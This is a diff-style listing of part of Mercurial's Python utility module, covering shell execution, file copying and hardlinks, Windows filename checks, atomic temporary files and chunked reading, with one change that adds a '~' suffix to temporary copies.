1030 1030 # executable version (py2exe) doesn't support __file__
1031 1031 datapath = os.path.dirname(pycompat.sysexecutable)
1032 1032 else:
1033 1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034 1034
1035 1035 i18n.setdatapath(datapath)
1036 1036
1037 1037 _hgexecutable = None
1038 1038
1039 1039 def hgexecutable():
1040 1040 """return location of the 'hg' executable.
1041 1041
1042 1042 Defaults to $HG or 'hg' in the search path.
1043 1043 """
1044 1044 if _hgexecutable is None:
1045 1045 hg = encoding.environ.get('HG')
1046 1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 1047 if hg:
1048 1048 _sethgexecutable(hg)
1049 1049 elif mainfrozen():
1050 1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 1051 # Env variable set by py2app
1052 1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 1053 else:
1054 1054 _sethgexecutable(pycompat.sysexecutable)
1055 1055 elif (os.path.basename(
1056 1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 1058 else:
1059 1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 1060 _sethgexecutable(exe)
1061 1061 return _hgexecutable
1062 1062
1063 1063 def _sethgexecutable(path):
1064 1064 """set location of the 'hg' executable"""
1065 1065 global _hgexecutable
1066 1066 _hgexecutable = path
1067 1067
1068 1068 def _isstdout(f):
1069 1069 fileno = getattr(f, 'fileno', None)
1070 1070 return fileno and fileno() == sys.__stdout__.fileno()
1071 1071
1072 1072 def shellenviron(environ=None):
1073 1073 """return environ with optional override, useful for shelling out"""
1074 1074 def py2shell(val):
1075 1075 'convert python object into string that is useful to shell'
1076 1076 if val is None or val is False:
1077 1077 return '0'
1078 1078 if val is True:
1079 1079 return '1'
1080 1080 return str(val)
1081 1081 env = dict(encoding.environ)
1082 1082 if environ:
1083 1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 1084 env['HG'] = hgexecutable()
1085 1085 return env
1086 1086
1087 1087 def system(cmd, environ=None, cwd=None, out=None):
1088 1088 '''enhanced shell command execution.
1089 1089 run with environment maybe modified, maybe in different dir.
1090 1090
1091 1091 if out is specified, it is assumed to be a file-like object that has a
1092 1092 write() method. stdout and stderr will be redirected to out.'''
1093 1093 try:
1094 1094 stdout.flush()
1095 1095 except Exception:
1096 1096 pass
1097 1097 cmd = quotecommand(cmd)
1098 1098 env = shellenviron(environ)
1099 1099 if out is None or _isstdout(out):
1100 1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 1101 env=env, cwd=cwd)
1102 1102 else:
1103 1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 1105 stderr=subprocess.STDOUT)
1106 1106 for line in iter(proc.stdout.readline, ''):
1107 1107 out.write(line)
1108 1108 proc.wait()
1109 1109 rc = proc.returncode
1110 1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 1111 rc = 0
1112 1112 return rc
1113 1113
1114 1114 def checksignature(func):
1115 1115 '''wrap a function with code to check for calling errors'''
1116 1116 def check(*args, **kwargs):
1117 1117 try:
1118 1118 return func(*args, **kwargs)
1119 1119 except TypeError:
1120 1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 1121 raise error.SignatureError
1122 1122 raise
1123 1123
1124 1124 return check
1125 1125
1126 1126 # a whilelist of known filesystems where hardlink works reliably
1127 1127 _hardlinkfswhitelist = {
1128 1128 'btrfs',
1129 1129 'ext2',
1130 1130 'ext3',
1131 1131 'ext4',
1132 1132 'hfs',
1133 1133 'jfs',
1134 1134 'reiserfs',
1135 1135 'tmpfs',
1136 1136 'ufs',
1137 1137 'xfs',
1138 1138 'zfs',
1139 1139 }
1140 1140
1141 1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 1142 '''copy a file, preserving mode and optionally other stat info like
1143 1143 atime/mtime
1144 1144
1145 1145 checkambig argument is used with filestat, and is useful only if
1146 1146 destination file is guarded by any lock (e.g. repo.lock or
1147 1147 repo.wlock).
1148 1148
1149 1149 copystat and checkambig should be exclusive.
1150 1150 '''
1151 1151 assert not (copystat and checkambig)
1152 1152 oldstat = None
1153 1153 if os.path.lexists(dest):
1154 1154 if checkambig:
1155 1155 oldstat = checkambig and filestat.frompath(dest)
1156 1156 unlink(dest)
1157 1157 if hardlink:
1158 1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 1159 # unless we are confident that dest is on a whitelisted filesystem.
1160 1160 try:
1161 1161 fstype = getfstype(os.path.dirname(dest))
1162 1162 except OSError:
1163 1163 fstype = None
1164 1164 if fstype not in _hardlinkfswhitelist:
1165 1165 hardlink = False
1166 1166 if hardlink:
1167 1167 try:
1168 1168 oslink(src, dest)
1169 1169 return
1170 1170 except (IOError, OSError):
1171 1171 pass # fall back to normal copy
1172 1172 if os.path.islink(src):
1173 1173 os.symlink(os.readlink(src), dest)
1174 1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 1175 # for them anyway
1176 1176 else:
1177 1177 try:
1178 1178 shutil.copyfile(src, dest)
1179 1179 if copystat:
1180 1180 # copystat also copies mode
1181 1181 shutil.copystat(src, dest)
1182 1182 else:
1183 1183 shutil.copymode(src, dest)
1184 1184 if oldstat and oldstat.stat:
1185 1185 newstat = filestat.frompath(dest)
1186 1186 if newstat.isambig(oldstat):
1187 1187 # stat of copied file is ambiguous to original one
1188 1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 1189 os.utime(dest, (advanced, advanced))
1190 1190 except shutil.Error as inst:
1191 1191 raise Abort(str(inst))
1192 1192
1193 1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 1194 """Copy a directory tree using hardlinks if possible."""
1195 1195 num = 0
1196 1196
1197 1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1198 1198
1199 1199 if os.path.isdir(src):
1200 1200 if hardlink is None:
1201 1201 hardlink = (os.stat(src).st_dev ==
1202 1202 os.stat(os.path.dirname(dst)).st_dev)
1203 1203 topic = gettopic()
1204 1204 os.mkdir(dst)
1205 1205 for name, kind in listdir(src):
1206 1206 srcname = os.path.join(src, name)
1207 1207 dstname = os.path.join(dst, name)
1208 1208 def nprog(t, pos):
1209 1209 if pos is not None:
1210 1210 return progress(t, pos + num)
1211 1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 1212 num += n
1213 1213 else:
1214 1214 if hardlink is None:
1215 1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 1216 os.stat(os.path.dirname(dst)).st_dev)
1217 1217 topic = gettopic()
1218 1218
1219 1219 if hardlink:
1220 1220 try:
1221 1221 oslink(src, dst)
1222 1222 except (IOError, OSError):
1223 1223 hardlink = False
1224 1224 shutil.copy(src, dst)
1225 1225 else:
1226 1226 shutil.copy(src, dst)
1227 1227 num += 1
1228 1228 progress(topic, num)
1229 1229 progress(topic, None)
1230 1230
1231 1231 return hardlink, num
1232 1232
1233 1233 _winreservednames = b'''con prn aux nul
1234 1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1235 1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1236 1236 _winreservedchars = ':*?"<>|'
1237 1237 def checkwinfilename(path):
1238 1238 r'''Check that the base-relative path is a valid filename on Windows.
1239 1239 Returns None if the path is ok, or a UI string describing the problem.
1240 1240
1241 1241 >>> checkwinfilename("just/a/normal/path")
1242 1242 >>> checkwinfilename("foo/bar/con.xml")
1243 1243 "filename contains 'con', which is reserved on Windows"
1244 1244 >>> checkwinfilename("foo/con.xml/bar")
1245 1245 "filename contains 'con', which is reserved on Windows"
1246 1246 >>> checkwinfilename("foo/bar/xml.con")
1247 1247 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1248 1248 "filename contains 'AUX', which is reserved on Windows"
1249 1249 >>> checkwinfilename("foo/bar/bla:.txt")
1250 1250 "filename contains ':', which is reserved on Windows"
1251 1251 >>> checkwinfilename("foo/bar/b\07la.txt")
1252 1252 "filename contains '\\x07', which is invalid on Windows"
1253 1253 >>> checkwinfilename("foo/bar/bla ")
1254 1254 "filename ends with ' ', which is not allowed on Windows"
1255 1255 >>> checkwinfilename("../bar")
1256 1256 >>> checkwinfilename("foo\\")
1257 1257 "filename ends with '\\', which is invalid on Windows"
1258 1258 >>> checkwinfilename("foo\\/bar")
1259 1259 "directory name ends with '\\', which is invalid on Windows"
1260 1260 '''
1261 1261 if path.endswith('\\'):
1262 1262 return _("filename ends with '\\', which is invalid on Windows")
1263 1263 if '\\/' in path:
1264 1264 return _("directory name ends with '\\', which is invalid on Windows")
1265 1265 for n in path.replace('\\', '/').split('/'):
1266 1266 if not n:
1267 1267 continue
1268 1268 for c in _filenamebytestr(n):
1269 1269 if c in _winreservedchars:
1270 1270 return _("filename contains '%s', which is reserved "
1271 1271 "on Windows") % c
1272 1272 if ord(c) <= 31:
1273 1273 return _("filename contains %r, which is invalid "
1274 1274 "on Windows") % c
1275 1275 base = n.split('.')[0]
1276 1276 if base and base.lower() in _winreservednames:
1277 1277 return _("filename contains '%s', which is reserved "
1278 1278 "on Windows") % base
1279 1279 t = n[-1]
1280 1280 if t in '. ' and n not in '..':
1281 1281 return _("filename ends with '%s', which is not allowed "
1282 1282 "on Windows") % t
1283 1283
1284 1284 if pycompat.osname == 'nt':
1285 1285 checkosfilename = checkwinfilename
1286 1286 timer = time.clock
1287 1287 else:
1288 1288 checkosfilename = platform.checkosfilename
1289 1289 timer = time.time
1290 1290
1291 1291 if safehasattr(time, "perf_counter"):
1292 1292 timer = time.perf_counter
1293 1293
1294 1294 def makelock(info, pathname):
1295 1295 try:
1296 1296 return os.symlink(info, pathname)
1297 1297 except OSError as why:
1298 1298 if why.errno == errno.EEXIST:
1299 1299 raise
1300 1300 except AttributeError: # no symlink in os
1301 1301 pass
1302 1302
1303 1303 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1304 1304 os.write(ld, info)
1305 1305 os.close(ld)
1306 1306
1307 1307 def readlock(pathname):
1308 1308 try:
1309 1309 return os.readlink(pathname)
1310 1310 except OSError as why:
1311 1311 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1312 1312 raise
1313 1313 except AttributeError: # no symlink in os
1314 1314 pass
1315 1315 fp = posixfile(pathname)
1316 1316 r = fp.read()
1317 1317 fp.close()
1318 1318 return r
1319 1319
1320 1320 def fstat(fp):
1321 1321 '''stat file object that may not have fileno method.'''
1322 1322 try:
1323 1323 return os.fstat(fp.fileno())
1324 1324 except AttributeError:
1325 1325 return os.stat(fp.name)
1326 1326
1327 1327 # File system features
1328 1328
1329 1329 def fscasesensitive(path):
1330 1330 """
1331 1331 Return true if the given path is on a case-sensitive filesystem
1332 1332
1333 1333 Requires a path (like /foo/.hg) ending with a foldable final
1334 1334 directory component.
1335 1335 """
1336 1336 s1 = os.lstat(path)
1337 1337 d, b = os.path.split(path)
1338 1338 b2 = b.upper()
1339 1339 if b == b2:
1340 1340 b2 = b.lower()
1341 1341 if b == b2:
1342 1342 return True # no evidence against case sensitivity
1343 1343 p2 = os.path.join(d, b2)
1344 1344 try:
1345 1345 s2 = os.lstat(p2)
1346 1346 if s2 == s1:
1347 1347 return False
1348 1348 return True
1349 1349 except OSError:
1350 1350 return True
1351 1351
1352 1352 try:
1353 1353 import re2
1354 1354 _re2 = None
1355 1355 except ImportError:
1356 1356 _re2 = False
1357 1357
1358 1358 class _re(object):
1359 1359 def _checkre2(self):
1360 1360 global _re2
1361 1361 try:
1362 1362 # check if match works, see issue3964
1363 1363 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1364 1364 except ImportError:
1365 1365 _re2 = False
1366 1366
1367 1367 def compile(self, pat, flags=0):
1368 1368 '''Compile a regular expression, using re2 if possible
1369 1369
1370 1370 For best performance, use only re2-compatible regexp features. The
1371 1371 only flags from the re module that are re2-compatible are
1372 1372 IGNORECASE and MULTILINE.'''
1373 1373 if _re2 is None:
1374 1374 self._checkre2()
1375 1375 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1376 1376 if flags & remod.IGNORECASE:
1377 1377 pat = '(?i)' + pat
1378 1378 if flags & remod.MULTILINE:
1379 1379 pat = '(?m)' + pat
1380 1380 try:
1381 1381 return re2.compile(pat)
1382 1382 except re2.error:
1383 1383 pass
1384 1384 return remod.compile(pat, flags)
1385 1385
1386 1386 @propertycache
1387 1387 def escape(self):
1388 1388 '''Return the version of escape corresponding to self.compile.
1389 1389
1390 1390 This is imperfect because whether re2 or re is used for a particular
1391 1391 function depends on the flags, etc, but it's the best we can do.
1392 1392 '''
1393 1393 global _re2
1394 1394 if _re2 is None:
1395 1395 self._checkre2()
1396 1396 if _re2:
1397 1397 return re2.escape
1398 1398 else:
1399 1399 return remod.escape
1400 1400
1401 1401 re = _re()
1402 1402
1403 1403 _fspathcache = {}
1404 1404 def fspath(name, root):
1405 1405 '''Get name in the case stored in the filesystem
1406 1406
1407 1407 The name should be relative to root, and be normcase-ed for efficiency.
1408 1408
1409 1409 Note that this function is unnecessary, and should not be
1410 1410 called, for case-sensitive filesystems (simply because it's expensive).
1411 1411
1412 1412 The root should be normcase-ed, too.
1413 1413 '''
1414 1414 def _makefspathcacheentry(dir):
1415 1415 return dict((normcase(n), n) for n in os.listdir(dir))
1416 1416
1417 1417 seps = pycompat.ossep
1418 1418 if pycompat.osaltsep:
1419 1419 seps = seps + pycompat.osaltsep
1420 1420 # Protect backslashes. This gets silly very quickly.
1421 1421 seps.replace('\\','\\\\')
1422 1422 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1423 1423 dir = os.path.normpath(root)
1424 1424 result = []
1425 1425 for part, sep in pattern.findall(name):
1426 1426 if sep:
1427 1427 result.append(sep)
1428 1428 continue
1429 1429
1430 1430 if dir not in _fspathcache:
1431 1431 _fspathcache[dir] = _makefspathcacheentry(dir)
1432 1432 contents = _fspathcache[dir]
1433 1433
1434 1434 found = contents.get(part)
1435 1435 if not found:
1436 1436 # retry "once per directory" per "dirstate.walk" which
1437 1437 # may take place for each patches of "hg qpush", for example
1438 1438 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1439 1439 found = contents.get(part)
1440 1440
1441 1441 result.append(found or part)
1442 1442 dir = os.path.join(dir, part)
1443 1443
1444 1444 return ''.join(result)
1445 1445
1446 1446 def getfstype(dirpath):
1447 1447 '''Get the filesystem type name from a directory (best-effort)
1448 1448
1449 1449 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1450 1450 '''
1451 1451 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1452 1452
1453 1453 def checknlink(testfile):
1454 1454 '''check whether hardlink count reporting works properly'''
1455 1455
1456 1456 # testfile may be open, so we need a separate file for checking to
1457 1457 # work around issue2543 (or testfile may get lost on Samba shares)
1458 1458 f1 = testfile + ".hgtmp1"
1459 1459 if os.path.lexists(f1):
1460 1460 return False
1461 1461 try:
1462 1462 posixfile(f1, 'w').close()
1463 1463 except IOError:
1464 1464 try:
1465 1465 os.unlink(f1)
1466 1466 except OSError:
1467 1467 pass
1468 1468 return False
1469 1469
1470 1470 f2 = testfile + ".hgtmp2"
1471 1471 fd = None
1472 1472 try:
1473 1473 oslink(f1, f2)
1474 1474 # nlinks() may behave differently for files on Windows shares if
1475 1475 # the file is open.
1476 1476 fd = posixfile(f2)
1477 1477 return nlinks(f2) > 1
1478 1478 except OSError:
1479 1479 return False
1480 1480 finally:
1481 1481 if fd is not None:
1482 1482 fd.close()
1483 1483 for f in (f1, f2):
1484 1484 try:
1485 1485 os.unlink(f)
1486 1486 except OSError:
1487 1487 pass
1488 1488
1489 1489 def endswithsep(path):
1490 1490 '''Check path ends with os.sep or os.altsep.'''
1491 1491 return (path.endswith(pycompat.ossep)
1492 1492 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1493 1493
1494 1494 def splitpath(path):
1495 1495 '''Split path by os.sep.
1496 1496 Note that this function does not use os.altsep because this is
1497 1497 an alternative of simple "xxx.split(os.sep)".
1498 1498 It is recommended to use os.path.normpath() before using this
1499 1499 function if need.'''
1500 1500 return path.split(pycompat.ossep)
1501 1501
1502 1502 def gui():
1503 1503 '''Are we running in a GUI?'''
1504 1504 if pycompat.sysplatform == 'darwin':
1505 1505 if 'SSH_CONNECTION' in encoding.environ:
1506 1506 # handle SSH access to a box where the user is logged in
1507 1507 return False
1508 1508 elif getattr(osutil, 'isgui', None):
1509 1509 # check if a CoreGraphics session is available
1510 1510 return osutil.isgui()
1511 1511 else:
1512 1512 # pure build; use a safe default
1513 1513 return True
1514 1514 else:
1515 1515 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1516 1516
1517 1517 def mktempcopy(name, emptyok=False, createmode=None):
1518 1518 """Create a temporary file with the same contents from name
1519 1519
1520 1520 The permission bits are copied from the original file.
1521 1521
1522 1522 If the temporary file is going to be truncated immediately, you
1523 1523 can use emptyok=True as an optimization.
1524 1524
1525 1525 Returns the name of the temporary file.
1526 1526 """
1527 1527 d, fn = os.path.split(name)
1528 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1528 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1529 1529 os.close(fd)
1530 1530 # Temporary files are created with mode 0600, which is usually not
1531 1531 # what we want. If the original file already exists, just copy
1532 1532 # its mode. Otherwise, manually obey umask.
1533 1533 copymode(name, temp, createmode)
1534 1534 if emptyok:
1535 1535 return temp
1536 1536 try:
1537 1537 try:
1538 1538 ifp = posixfile(name, "rb")
1539 1539 except IOError as inst:
1540 1540 if inst.errno == errno.ENOENT:
1541 1541 return temp
1542 1542 if not getattr(inst, 'filename', None):
1543 1543 inst.filename = name
1544 1544 raise
1545 1545 ofp = posixfile(temp, "wb")
1546 1546 for chunk in filechunkiter(ifp):
1547 1547 ofp.write(chunk)
1548 1548 ifp.close()
1549 1549 ofp.close()
1550 1550 except: # re-raises
1551 1551 try: os.unlink(temp)
1552 1552 except OSError: pass
1553 1553 raise
1554 1554 return temp
1555 1555
1556 1556 class filestat(object):
1557 1557 """help to exactly detect change of a file
1558 1558
1559 1559 'stat' attribute is result of 'os.stat()' if specified 'path'
1560 1560 exists. Otherwise, it is None. This can avoid preparative
1561 1561 'exists()' examination on client side of this class.
1562 1562 """
1563 1563 def __init__(self, stat):
1564 1564 self.stat = stat
1565 1565
1566 1566 @classmethod
1567 1567 def frompath(cls, path):
1568 1568 try:
1569 1569 stat = os.stat(path)
1570 1570 except OSError as err:
1571 1571 if err.errno != errno.ENOENT:
1572 1572 raise
1573 1573 stat = None
1574 1574 return cls(stat)
1575 1575
1576 1576 @classmethod
1577 1577 def fromfp(cls, fp):
1578 1578 stat = os.fstat(fp.fileno())
1579 1579 return cls(stat)
1580 1580
1581 1581 __hash__ = object.__hash__
1582 1582
1583 1583 def __eq__(self, old):
1584 1584 try:
1585 1585 # if ambiguity between stat of new and old file is
1586 1586 # avoided, comparison of size, ctime and mtime is enough
1587 1587 # to exactly detect change of a file regardless of platform
1588 1588 return (self.stat.st_size == old.stat.st_size and
1589 1589 self.stat.st_ctime == old.stat.st_ctime and
1590 1590 self.stat.st_mtime == old.stat.st_mtime)
1591 1591 except AttributeError:
1592 1592 pass
1593 1593 try:
1594 1594 return self.stat is None and old.stat is None
1595 1595 except AttributeError:
1596 1596 return False
1597 1597
1598 1598 def isambig(self, old):
1599 1599 """Examine whether new (= self) stat is ambiguous against old one
1600 1600
1601 1601 "S[N]" below means stat of a file at N-th change:
1602 1602
1603 1603 - S[n-1].ctime < S[n].ctime: can detect change of a file
1604 1604 - S[n-1].ctime == S[n].ctime
1605 1605 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1606 1606 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1607 1607 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1608 1608 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1609 1609
1610 1610 Case (*2) above means that a file was changed twice or more at
1611 1611 same time in sec (= S[n-1].ctime), and comparison of timestamp
1612 1612 is ambiguous.
1613 1613
1614 1614 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1615 1615 timestamp is ambiguous".
1616 1616
1617 1617 But advancing mtime only in case (*2) doesn't work as
1618 1618 expected, because naturally advanced S[n].mtime in case (*1)
1619 1619 might be equal to manually advanced S[n-1 or earlier].mtime.
1620 1620
1621 1621 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1622 1622 treated as ambiguous regardless of mtime, to avoid overlooking
1623 1623 by confliction between such mtime.
1624 1624
1625 1625 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1626 1626 S[n].mtime", even if size of a file isn't changed.
1627 1627 """
1628 1628 try:
1629 1629 return (self.stat.st_ctime == old.stat.st_ctime)
1630 1630 except AttributeError:
1631 1631 return False
1632 1632
1633 1633 def avoidambig(self, path, old):
1634 1634 """Change file stat of specified path to avoid ambiguity
1635 1635
1636 1636 'old' should be previous filestat of 'path'.
1637 1637
1638 1638 This skips avoiding ambiguity, if a process doesn't have
1639 1639 appropriate privileges for 'path'. This returns False in this
1640 1640 case.
1641 1641
1642 1642 Otherwise, this returns True, as "ambiguity is avoided".
1643 1643 """
1644 1644 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1645 1645 try:
1646 1646 os.utime(path, (advanced, advanced))
1647 1647 except OSError as inst:
1648 1648 if inst.errno == errno.EPERM:
1649 1649 # utime() on the file created by another user causes EPERM,
1650 1650 # if a process doesn't have appropriate privileges
1651 1651 return False
1652 1652 raise
1653 1653 return True
1654 1654
1655 1655 def __ne__(self, other):
1656 1656 return not self == other
1657 1657
1658 1658 class atomictempfile(object):
1659 1659 '''writable file object that atomically updates a file
1660 1660
1661 1661 All writes will go to a temporary copy of the original file. Call
1662 1662 close() when you are done writing, and atomictempfile will rename
1663 1663 the temporary copy to the original name, making the changes
1664 1664 visible. If the object is destroyed without being closed, all your
1665 1665 writes are discarded.
1666 1666
1667 1667 checkambig argument of constructor is used with filestat, and is
1668 1668 useful only if target file is guarded by any lock (e.g. repo.lock
1669 1669 or repo.wlock).
1670 1670 '''
1671 1671 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1672 1672 self.__name = name # permanent name
1673 1673 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1674 1674 createmode=createmode)
1675 1675 self._fp = posixfile(self._tempname, mode)
1676 1676 self._checkambig = checkambig
1677 1677
1678 1678 # delegated methods
1679 1679 self.read = self._fp.read
1680 1680 self.write = self._fp.write
1681 1681 self.seek = self._fp.seek
1682 1682 self.tell = self._fp.tell
1683 1683 self.fileno = self._fp.fileno
1684 1684
1685 1685 def close(self):
1686 1686 if not self._fp.closed:
1687 1687 self._fp.close()
1688 1688 filename = localpath(self.__name)
1689 1689 oldstat = self._checkambig and filestat.frompath(filename)
1690 1690 if oldstat and oldstat.stat:
1691 1691 rename(self._tempname, filename)
1692 1692 newstat = filestat.frompath(filename)
1693 1693 if newstat.isambig(oldstat):
1694 1694 # stat of changed file is ambiguous to original one
1695 1695 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1696 1696 os.utime(filename, (advanced, advanced))
1697 1697 else:
1698 1698 rename(self._tempname, filename)
1699 1699
1700 1700 def discard(self):
1701 1701 if not self._fp.closed:
1702 1702 try:
1703 1703 os.unlink(self._tempname)
1704 1704 except OSError:
1705 1705 pass
1706 1706 self._fp.close()
1707 1707
1708 1708 def __del__(self):
1709 1709 if safehasattr(self, '_fp'): # constructor actually did something
1710 1710 self.discard()
1711 1711
1712 1712 def __enter__(self):
1713 1713 return self
1714 1714
1715 1715 def __exit__(self, exctype, excvalue, traceback):
1716 1716 if exctype is not None:
1717 1717 self.discard()
1718 1718 else:
1719 1719 self.close()
1720 1720
1721 1721 def unlinkpath(f, ignoremissing=False):
1722 1722 """unlink and remove the directory if it is empty"""
1723 1723 if ignoremissing:
1724 1724 tryunlink(f)
1725 1725 else:
1726 1726 unlink(f)
1727 1727 # try removing directories that might now be empty
1728 1728 try:
1729 1729 removedirs(os.path.dirname(f))
1730 1730 except OSError:
1731 1731 pass
1732 1732
1733 1733 def tryunlink(f):
1734 1734 """Attempt to remove a file, ignoring ENOENT errors."""
1735 1735 try:
1736 1736 unlink(f)
1737 1737 except OSError as e:
1738 1738 if e.errno != errno.ENOENT:
1739 1739 raise
1740 1740
1741 1741 def makedirs(name, mode=None, notindexed=False):
1742 1742 """recursive directory creation with parent mode inheritance
1743 1743
1744 1744 Newly created directories are marked as "not to be indexed by
1745 1745 the content indexing service", if ``notindexed`` is specified
1746 1746 for "write" mode access.
1747 1747 """
1748 1748 try:
1749 1749 makedir(name, notindexed)
1750 1750 except OSError as err:
1751 1751 if err.errno == errno.EEXIST:
1752 1752 return
1753 1753 if err.errno != errno.ENOENT or not name:
1754 1754 raise
1755 1755 parent = os.path.dirname(os.path.abspath(name))
1756 1756 if parent == name:
1757 1757 raise
1758 1758 makedirs(parent, mode, notindexed)
1759 1759 try:
1760 1760 makedir(name, notindexed)
1761 1761 except OSError as err:
1762 1762 # Catch EEXIST to handle races
1763 1763 if err.errno == errno.EEXIST:
1764 1764 return
1765 1765 raise
1766 1766 if mode is not None:
1767 1767 os.chmod(name, mode)
1768 1768
1769 1769 def readfile(path):
1770 1770 with open(path, 'rb') as fp:
1771 1771 return fp.read()
1772 1772
1773 1773 def writefile(path, text):
1774 1774 with open(path, 'wb') as fp:
1775 1775 fp.write(text)
1776 1776
1777 1777 def appendfile(path, text):
1778 1778 with open(path, 'ab') as fp:
1779 1779 fp.write(text)
1780 1780
1781 1781 class chunkbuffer(object):
1782 1782 """Allow arbitrary sized chunks of data to be efficiently read from an
1783 1783 iterator over chunks of arbitrary size."""
1784 1784
1785 1785 def __init__(self, in_iter):
1786 1786 """in_iter is the iterator that's iterating over the input chunks."""
1787 1787 def splitbig(chunks):
1788 1788 for chunk in chunks:
1789 1789 if len(chunk) > 2**20:
1790 1790 pos = 0
1791 1791 while pos < len(chunk):
1792 1792 end = pos + 2 ** 18
1793 1793 yield chunk[pos:end]
1794 1794 pos = end
1795 1795 else:
1796 1796 yield chunk
1797 1797 self.iter = splitbig(in_iter)
1798 1798 self._queue = collections.deque()
1799 1799 self._chunkoffset = 0
1800 1800
1801 1801 def read(self, l=None):
1802 1802 """Read L bytes of data from the iterator of chunks of data.
1803 1803 Returns less than L bytes if the iterator runs dry.
1804 1804
1805 1805 If size parameter is omitted, read everything"""
1806 1806 if l is None:
1807 1807 return ''.join(self.iter)
1808 1808
1809 1809 left = l
1810 1810 buf = []
1811 1811 queue = self._queue
1812 1812 while left > 0:
1813 1813 # refill the queue
1814 1814 if not queue:
1815 1815 target = 2**18
1816 1816 for chunk in self.iter:
1817 1817 queue.append(chunk)
1818 1818 target -= len(chunk)
1819 1819 if target <= 0:
1820 1820 break
1821 1821 if not queue:
1822 1822 break
1823 1823
1824 1824 # The easy way to do this would be to queue.popleft(), modify the
1825 1825 # chunk (if necessary), then queue.appendleft(). However, for cases
1826 1826 # where we read partial chunk content, this incurs 2 dequeue
1827 1827 # mutations and creates a new str for the remaining chunk in the
1828 1828 # queue. Our code below avoids this overhead.
1829 1829
1830 1830 chunk = queue[0]
1831 1831 chunkl = len(chunk)
1832 1832 offset = self._chunkoffset
1833 1833
1834 1834 # Use full chunk.
1835 1835 if offset == 0 and left >= chunkl:
1836 1836 left -= chunkl
1837 1837 queue.popleft()
1838 1838 buf.append(chunk)
1839 1839 # self._chunkoffset remains at 0.
1840 1840 continue
1841 1841
1842 1842 chunkremaining = chunkl - offset
1843 1843
1844 1844 # Use all of unconsumed part of chunk.
1845 1845 if left >= chunkremaining:
1846 1846 left -= chunkremaining
1847 1847 queue.popleft()
1848 1848 # offset == 0 is enabled by block above, so this won't merely
1849 1849 # copy via ``chunk[0:]``.
1850 1850 buf.append(chunk[offset:])
1851 1851 self._chunkoffset = 0
1852 1852
1853 1853 # Partial chunk needed.
1854 1854 else:
1855 1855 buf.append(chunk[offset:offset + left])
1856 1856 self._chunkoffset += left
1857 1857 left -= chunkremaining
1858 1858
1859 1859 return ''.join(buf)
1860 1860
1861 1861 def filechunkiter(f, size=131072, limit=None):
1862 1862 """Create a generator that produces the data in the file size
1863 1863 (default 131072) bytes at a time, up to optional limit (default is
1864 1864 to read all data). Chunks may be less than size bytes if the
1865 1865 chunk is the last chunk in the file, or the file is a socket or
1866 1866 some other type of file that sometimes reads less data than is
1867 1867 requested."""
1868 1868 assert size >= 0
1869 1869 assert limit is None or limit >= 0
1870 1870 while True:
1871 1871 if limit is None:
1872 1872 nbytes = size
1873 1873 else:
1874 1874 nbytes = min(limit, size)
1875 1875 s = nbytes and f.read(nbytes)
1876 1876 if not s:
1877 1877 break
1878 1878 if limit:
1879 1879 limit -= len(s)
1880 1880 yield s
1881 1881
1882 1882 def makedate(timestamp=None):
1883 1883 '''Return a unix timestamp (or the current time) as a (unixtime,
1884 1884 offset) tuple based off the local timezone.'''
1885 1885 if timestamp is None:
1886 1886 timestamp = time.time()
1887 1887 if timestamp < 0:
1888 1888 hint = _("check your clock")
1889 1889 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1890 1890 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1891 1891 datetime.datetime.fromtimestamp(timestamp))
1892 1892 tz = delta.days * 86400 + delta.seconds
1893 1893 return timestamp, tz
1894 1894
